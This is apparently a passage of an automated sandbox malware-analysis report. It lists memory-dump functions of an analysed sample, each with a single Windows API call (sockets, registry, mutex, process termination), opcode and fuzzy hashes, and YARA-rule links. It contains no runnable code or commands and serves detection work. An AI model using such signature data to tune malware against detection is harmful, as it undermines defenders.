Opcode ID: b150e866cbe8b2037e1a0963b550c478cd2df864206bba64d1453228d00aab26
Instruction ID: 0ee2372d6678fd11b443a5bcc3f5273f02080a67ee8093de4cd84895a38461e0
Opcode Fuzzy Hash: b150e866cbe8b2037e1a0963b550c478cd2df864206bba64d1453228d00aab26
Instruction Fuzzy Hash: 0C41C5B5509380AFEB15CF14DC85BA6BFA8EF46324F0884EBED448F252D3749945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0549183D, Relevance: 1.6, APIs: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05491906

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: cf71fe6e7acbebf9364e085bfd54bafeafd292906de611fd5d7574ee7dc73090
Instruction ID: 3852c2e8966d6f43788a3fc043a60034e1508031c494c8a1afbfe51b1c1e0a80
Opcode Fuzzy Hash: cf71fe6e7acbebf9364e085bfd54bafeafd292906de611fd5d7574ee7dc73090
Instruction Fuzzy Hash: F841907140D7C0AFE7238B658C55B96BFB4EF07210F0985DBE9C58F1A3C265A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0233AB72, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 0233AC31

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4d9af6d16bfd5c6dceb9dfffbe33956e46ab01266d5ff6547122a7cad27f0d15
Instruction ID: efa1217639eb64ec99fa67969c70ce194eafd4fb1319354906006d245fef7380
Opcode Fuzzy Hash: 4d9af6d16bfd5c6dceb9dfffbe33956e46ab01266d5ff6547122a7cad27f0d15
Instruction Fuzzy Hash: C93161B25087846FE7238B25DC85FA7BFB8EF06710F08849AE981DB153D264E949C771

Uniqueness

Uniqueness Score: -1.00%

Function 05492617, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E94), ref: 054926EB

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 5732bc94647943917b74c7d287fece62f62bbebe7845a0448d7e5a5db96bc7a3
Instruction ID: ca8e03bca2f7705a8aceaa5f63ccc73ef1a288aa9f20f58fcb8eac13771562fb
Opcode Fuzzy Hash: 5732bc94647943917b74c7d287fece62f62bbebe7845a0448d7e5a5db96bc7a3
Instruction Fuzzy Hash: 1431A3B1104385AFEB22CB25CC85FA7BFACEF05710F14499AE9849B182D275A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 054929C7, Relevance: 1.6, APIs: 1, Instructions: 93encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E94,?,?), ref: 05492A8A

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 224eb9578514a2d7492fd980539c8db48282da9cde32436cc86077ec06034e00
Instruction ID: fe7fe53225f932ac94d3605df0d9c5dbd2b69db7105f57d7695be4bc359d1882
Opcode Fuzzy Hash: 224eb9578514a2d7492fd980539c8db48282da9cde32436cc86077ec06034e00
Instruction Fuzzy Hash: 07316D7554D3C45FD7138B258C61A62BFB4EF47614F0A84DBD8848F1A3D224A91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 054928C9, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0549297D

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 2b9d9b91153dff1b51d6131abbf04b5d4b65bba58dcfe234cca04ba5e349095b
Instruction ID: f17d202906afac4c744c3e666d03aa3917978aa46e014d53f932e8a4148d3ef6
Opcode Fuzzy Hash: 2b9d9b91153dff1b51d6131abbf04b5d4b65bba58dcfe234cca04ba5e349095b
Instruction Fuzzy Hash: 5F3182B5109780AFEB22CF25CC45F92BFB8EF05310F08849AE9858B162D274E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05490B43, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05490BF8

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b1da4a2badbb040d492e200bc7e24b5970566f01a84e6d5b52cfe0350cf688a7
Instruction ID: 3753e37d3d25ab915d58a5f895a29b931683f95c92993021953ef816a5e8e826
Opcode Fuzzy Hash: b1da4a2badbb040d492e200bc7e24b5970566f01a84e6d5b52cfe0350cf688a7
Instruction Fuzzy Hash: 3E3172B15093845FEB22CF65CC45F92BFB8AF06310F08889AE9859B152D274E809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054907C8, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 05490869

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac42564e7c849531ffc1ba85fac345c62f001ebf1132c60c78905928beec5a97
Instruction ID: 86042a26dd00cbb92b24b8f5f20eea6de8e878d18ac0015d9c88225478310bfd
Opcode Fuzzy Hash: ac42564e7c849531ffc1ba85fac345c62f001ebf1132c60c78905928beec5a97
Instruction Fuzzy Hash: E7318FB1504380AFE722CF25DC45FA6BFE8EF05610F0884AEE9898B252D375E805CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0233AC79, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0233AD34

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1a6bedd230d00c8660570b6d7970e0d97318cf6d18a243d5b5b5737419b5ce17
Instruction ID: a71149b264281a7e1f653ed5bbe2ee40ed4f4782ded267880e40e82ded3156eb
Opcode Fuzzy Hash: 1a6bedd230d00c8660570b6d7970e0d97318cf6d18a243d5b5b5737419b5ce17
Instruction Fuzzy Hash: 67318F711093846FE722CF25CC85F92BFB8EF06714F18849AE985CB163D364E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05491B7E, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05491C28

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 59ccf906f375c46111343b2936ec60d42e12292480446b05171f542c1fa7b0bb
Instruction ID: 4cbd812008489599355cb0ee2abfbe67b058b29d76b64bf17887e98a3fab6b81
Opcode Fuzzy Hash: 59ccf906f375c46111343b2936ec60d42e12292480446b05171f542c1fa7b0bb
Instruction Fuzzy Hash: C63180B25093806FEB22CB25CD45F93BFB8EF06314F0884DBE9859B253D264E949C761

Uniqueness

Uniqueness Score: -1.00%

Function 05491F14, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05491FC6

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: bd58365669f002ea9fd6863be747bf529b01a0a01b7e5a3d62c41ff540980c7c
Instruction ID: a87cc7df34df6ff65ca65e7af1e84eaaecd5aed4124fac613deaf082df9162f5
Opcode Fuzzy Hash: bd58365669f002ea9fd6863be747bf529b01a0a01b7e5a3d62c41ff540980c7c
Instruction Fuzzy Hash: 6631A2B2404780AFE722CF65DC45F96FFF8EF06324F08459AE9858B252D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0233B4C4, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0233B558

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: c17b53bfcdacdf851a2c98f85b9d5b067ec3c1ce6665232d08eb9c9e0ce41942
Instruction ID: c9222273544de6cbe1323e4b5dcc64a9aab9997580d8ecbd3a18eec9d7c1a473
Opcode Fuzzy Hash: c17b53bfcdacdf851a2c98f85b9d5b067ec3c1ce6665232d08eb9c9e0ce41942
Instruction Fuzzy Hash: 3021A3B25093806FE7128B25DC46B96BFA8EF46324F0884EAE985DF193D264D905C761

Uniqueness

Uniqueness Score: -1.00%

Function 05492D26, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492DBE

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 73c54015555ef987be5d76aa3447183a9f23957fb8e55678be209f9ce40dddff
Instruction ID: cee9037d36cfb6cccd4385529d3aafc86e9ba48bd696609d634dd9f77aa7fbc5
Opcode Fuzzy Hash: 73c54015555ef987be5d76aa3447183a9f23957fb8e55678be209f9ce40dddff
Instruction Fuzzy Hash: 2121A2B250D3806FEB12CB25DC55BA6BFB8EF06310F0884DAE9849F153D264A849C761

Uniqueness

Uniqueness Score: -1.00%

Function 054921C9, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05492269

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 189fd9dfc7a3a2014a42899771997843aa336c0f763cf175c7b5d6a70e5b657b
Instruction ID: 8c6c06c171cc9e5f3b6a6f71c474ea52094f3cf8e36baebc6676f2691a4a80f0
Opcode Fuzzy Hash: 189fd9dfc7a3a2014a42899771997843aa336c0f763cf175c7b5d6a70e5b657b
Instruction Fuzzy Hash: B131A0B5509780AFE726CF25CC85F56FFE8EF05210F0885AAE9858B292D365E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05492646, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E94), ref: 054926EB

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: db2ef13f40b6b1f0469429e37812ddc361453b28099c2946ca52b747b6b0fdbe
Instruction ID: 094273acb72e01efa82d83dae022ebedf0a3565c2374270fcb6ea303eaa085b2
Opcode Fuzzy Hash: db2ef13f40b6b1f0469429e37812ddc361453b28099c2946ca52b747b6b0fdbe
Instruction Fuzzy Hash: 9321A3B1100304BFFB31DF55DC85FABFBACEF04710F14886AEA459A181D6B4A9458B71

Uniqueness

Uniqueness Score: -1.00%

Function 05490A5A, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 05490AEE

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5b790b7fd0f26e059032c8cb949e7140ab83b4e3396a1065eda01c7b18b741d9
Instruction ID: 20de96f02bc162b83dfad3937297f4df2845baf5a99f5dd8609cee66cbd33ea3
Opcode Fuzzy Hash: 5b790b7fd0f26e059032c8cb949e7140ab83b4e3396a1065eda01c7b18b741d9
Instruction Fuzzy Hash: A12180B2505344AFEB228F65DC49F67FFA8EF05710F0888AAED449B152D264A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05492E1D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492EAE

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 3cd9dd2e0b74585de47bd0996bea7ea015aca8a82de05b114ff79e9045d78f18
Instruction ID: a71bb79a2b535e4e4d1db6e5a6d0a293080a08409aaa35c13220f5a747f37196
Opcode Fuzzy Hash: 3cd9dd2e0b74585de47bd0996bea7ea015aca8a82de05b114ff79e9045d78f18
Instruction Fuzzy Hash: 3F21A8B55493806FEB12CF25DC45FA7BFA8EF06210F0884ABE945DB252D274E904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 054915D3, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E94,?,?), ref: 05491676

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: fda5b81794b470711f6e45a0168b81d6051d427040d1c1f11aa838c6e143db61
Instruction ID: c268c2923bd66c061f816539a4b098f70376e75c884551dc8b7857802e623093
Opcode Fuzzy Hash: fda5b81794b470711f6e45a0168b81d6051d427040d1c1f11aa838c6e143db61
Instruction Fuzzy Hash: E521B5755093C06FD3138B258C51B62BFB4EF47614F0981CBE8848B593D225A91AD7B2

Uniqueness

Uniqueness Score: -1.00%

Function 054923A4, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0549242D

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: e5cd8e4c99215a5f7decb28fbf7002d626cded44c7372b88ad966b78a889731e
Instruction ID: 1272e97976c414f46176f95c65c7914dbc7848ee651ddf7902fb5844a9fcb90e
Opcode Fuzzy Hash: e5cd8e4c99215a5f7decb28fbf7002d626cded44c7372b88ad966b78a889731e
Instruction Fuzzy Hash: 7421D8B1109380AFEB22CF25DD45FA7BFB8EF46310F0884ABE9859B152C274E445C761

Uniqueness

Uniqueness Score: -1.00%

Function 05491E32, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05491EBD

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: ad3d8658fd2317a8fa9e508a01953b8da300fedcedc2f7fc5c5b07c838e9cb83
Instruction ID: 4e116da3d0705abb9ee9226cf7d4c551fc32a858bfdc19685810b3acbe0aea7f
Opcode Fuzzy Hash: ad3d8658fd2317a8fa9e508a01953b8da300fedcedc2f7fc5c5b07c838e9cb83
Instruction Fuzzy Hash: 98217FB1509780AFE722CB25DD45F66FFE8EF05220F0884AEE9858B252D375E908C765

Uniqueness

Uniqueness Score: -1.00%

Function 05493BCF, Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05493C56

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: f649592d436d66db16d4c58f5b206f032bd317a495b9bef2663b611fed9d361b
Instruction ID: 32623d713cc67487a68878623c06c3e3caf8050fa709195ac3708b0bb4e71f2f
Opcode Fuzzy Hash: f649592d436d66db16d4c58f5b206f032bd317a495b9bef2663b611fed9d361b
Instruction Fuzzy Hash: D12195B11043806FEB12CF25DD45F66BFB8EF46310F1884DBE9859B152C274E844C761

Uniqueness

Uniqueness Score: -1.00%

Function 05490988, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E94,?,?), ref: 05490A2E

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: d1fd083e5500fb9ab0cd7a74e00fbbbd6be11587db79ee0ebce3c66e23f42cad
Instruction ID: 715f87ceae2b6576c1c0b2a73ed52b39dcad9295867c791414be89839aab4737
Opcode Fuzzy Hash: d1fd083e5500fb9ab0cd7a74e00fbbbd6be11587db79ee0ebce3c66e23f42cad
Instruction Fuzzy Hash: 3F21837550E3C06FC3138B358C55A11BFB4EF47A14F1D81DFD8848B5A3D225A91AD7A2

Uniqueness

Uniqueness Score: -1.00%

Function 054907EA, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 05490869

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fabc912b4150a29a3f221b36d951492776edee11cde35794bded7b1c7a005a0
Instruction ID: 85824d3b07fec0a91c40f713c011d24394dd616b84e3d42ef872a8cc30638826
Opcode Fuzzy Hash: 0fabc912b4150a29a3f221b36d951492776edee11cde35794bded7b1c7a005a0
Instruction Fuzzy Hash: 38217FB1600740AFEB25CF65DD45BA6FFE8EF04710F0488AAE9898B651D375E405CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 054901A4, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E94), ref: 0549023F

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e93a3fd533c34f2d7b6d28a2a7c74064397b2812b1453ad705fe9b7b806973d
Instruction ID: b623a3be7034486707a2fa94672e1f40bebc9242f3214979c07adb18f21d87cc
Opcode Fuzzy Hash: 6e93a3fd533c34f2d7b6d28a2a7c74064397b2812b1453ad705fe9b7b806973d
Instruction Fuzzy Hash: 5421C8711493806FE722CF15CC46FA6BFB8EF46724F1880DAE9845F192C265A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0233A078, Relevance: 1.6, APIs: 1, Instructions: 76networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E94,?,?), ref: 0233A10E

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 488d1657b1aa0db51f8a414c9bc7dc7e8b01bf0e9c2e999ce8a727fe8e7e9902
Instruction ID: b3642d69b529759bad5fff27f3638d54b960b07809e542065e01ca07752a0bbe
Opcode Fuzzy Hash: 488d1657b1aa0db51f8a414c9bc7dc7e8b01bf0e9c2e999ce8a727fe8e7e9902
Instruction Fuzzy Hash: 5121D0B140D3C06FD3128B258C51B66BFB4EF47620F0981DBD984CF293D224A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 054927F6, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0549287F

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: d61c3ab664986a40a6c123f8163a615e32bcc0f557c5c985a9d2736f3f85508a
Instruction ID: 1c3f097da1edf1c436cad719ca5230c2a6d978da86f7deb77d41af37f463ca78
Opcode Fuzzy Hash: d61c3ab664986a40a6c123f8163a615e32bcc0f557c5c985a9d2736f3f85508a
Instruction Fuzzy Hash: E321A4B14093846FE712CF259C45F96BFB8EF06310F0884EBE9849F193C274A908C761

Uniqueness

Uniqueness Score: -1.00%

Function 05490DAC, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05490E3D

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c5408a4d487f01b0baa48b87c7792c6a3709a42637d62e53a351e631341db7fb
Instruction ID: e0d46e51d3b8b751768de5b0338ea420f38d75f9506568f9812b2cdaebe15387
Opcode Fuzzy Hash: c5408a4d487f01b0baa48b87c7792c6a3709a42637d62e53a351e631341db7fb
Instruction Fuzzy Hash: CF2190B1409380AFEB22CF65DD45F56BFB8EF46314F0884DBE9849B153C264A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0233ABB2, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 0233AC31

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 0e8afdfe33760fa0adbe703bfd13ddaa7fee037d6c03d6f9cb5089566570d741
Instruction ID: d50b0de4e06719460bd84bdfc19baee3d6b45875190dc134abf73a3469be5419
Opcode Fuzzy Hash: 0e8afdfe33760fa0adbe703bfd13ddaa7fee037d6c03d6f9cb5089566570d741
Instruction Fuzzy Hash: 6F21C2B2500704AFE722CF55CC85F6BFBECEF04720F04845AED81DA641D624E505CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05490A7A, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E94), ref: 05490AEE

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: f4f250a0fed0b1e3614cdd1b710b3c5fbdadfa62afec0fd3935254e902b7d868
Instruction ID: f0fdcfec2bc5223bcf5fc824bf4a9ca7f58dcdb0858f66aa68419c11fdc6a973
Opcode Fuzzy Hash: f4f250a0fed0b1e3614cdd1b710b3c5fbdadfa62afec0fd3935254e902b7d868
Instruction Fuzzy Hash: FA2192B1500304AFEB21DF55DC49FABFBA8EF04720F14886AED459A241D674E405CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05492AC2, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492B46

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 328a99c39927237993c71a79685cb27b48fde8161877ccfb6aebb17e6a1d2a3f
Instruction ID: d927efea5ac4e034e8081ad9eebc62342ac563cc46844a7351eba27a3c20ffb5
Opcode Fuzzy Hash: 328a99c39927237993c71a79685cb27b48fde8161877ccfb6aebb17e6a1d2a3f
Instruction Fuzzy Hash: 90216DB24083846FEB22CF65DC45F97BFA8EF45220F0884ABE9459B152D264A508CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05492B90, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05492C25

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 6e6c4dd6edc89c0bcea44c830b69086e33afa0c3687144a8d39c879c9f9858ce
Instruction ID: 49d076d9ad906bd7fda5b48bcf542bdf7e7f39c3e7dcd0f54bdfdc6981f76e13
Opcode Fuzzy Hash: 6e6c4dd6edc89c0bcea44c830b69086e33afa0c3687144a8d39c879c9f9858ce
Instruction Fuzzy Hash: E121A1B54093846FEB228F15DC45FA6BFB8EF06314F0984DAE9849B153C265A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05492902, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 0549297D

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: cef8f1a7f6f082824d5490bd7372f217d48757c91844e7ae8d1d610bc7d53757
Instruction ID: c77554652a16c6f421899d3e1dced72f0a5a588e288e9686ab8d2cb4b99c37c2
Opcode Fuzzy Hash: cef8f1a7f6f082824d5490bd7372f217d48757c91844e7ae8d1d610bc7d53757
Instruction Fuzzy Hash: 88216AB5204305AFEB21CF55DC85FA6BBE8EF08720F4488AAED458B651D274E805CB71

Uniqueness

Uniqueness Score: -1.00%

Function 054921F6, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05492269

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: c90ab990c378251baa817bbb65e9319a5fcdc2e0ff354841b87d5c8465e3dae6
Instruction ID: c69328127e9f3db6832e03006fcee8ce3cfaf28c290844c1317fea434be12f28
Opcode Fuzzy Hash: c90ab990c378251baa817bbb65e9319a5fcdc2e0ff354841b87d5c8465e3dae6
Instruction Fuzzy Hash: AF2183B5608740AFE725CF65DC86BA6FBE8EF04710F0484AAED458B341D775E405CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05493CB6, Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E94,057ECA00,00000000,00000000,00000000,00000000), ref: 05493D3E

Memory Dump Source

Source File: 00000002.00000002.944340066.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 1936722ffb7a2100f4edc8c4f651efcf541f39ba94bfe64ddae466c1b879e34e
Instruction ID: 090921c4cfe0548bb161f62d5dd108ed8743d3c784907b239fddf98b7f8cc7b5
Opcode Fuzzy Hash: 1936722ffb7a2100f4edc8c4f651efcf541f39ba94bfe64ddae466c1b879e34e
Instruction Fuzzy Hash: A52171B1508380AFEB22CF55DC45F66FFA8EF46314F0885ABE9459B152C275A409C761

Uniqueness

Uniqueness Score: -1.00%

Function 0233AF97, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0233B012

Memory Dump Source

Source File: 00000002.00000002.942535719.000000000233A000.00000040.00000001.sdmp, Offset: 0233A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1b51b8db44c2e692e1da7dd55187e8b802d84d67636fe7b33e429925e4264c91
Instruction ID: 8d829d1b45efc1b16ae65a20dd1093f9597225d564b7f473c1567e8af7795796
Opcode Fuzzy Hash: 1b51b8db44c2e692e1da7dd55187e8b802d84d67636fe7b33e429925e4264c91
Instruction Fuzzy Hash: 5F2180B65093805FD712CB25DC85B92BFE8EF06214F0984EBE985CB253D334E948C761

Uniqueness

Uniqueness Score: -1.00%

Function 05490CEA, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

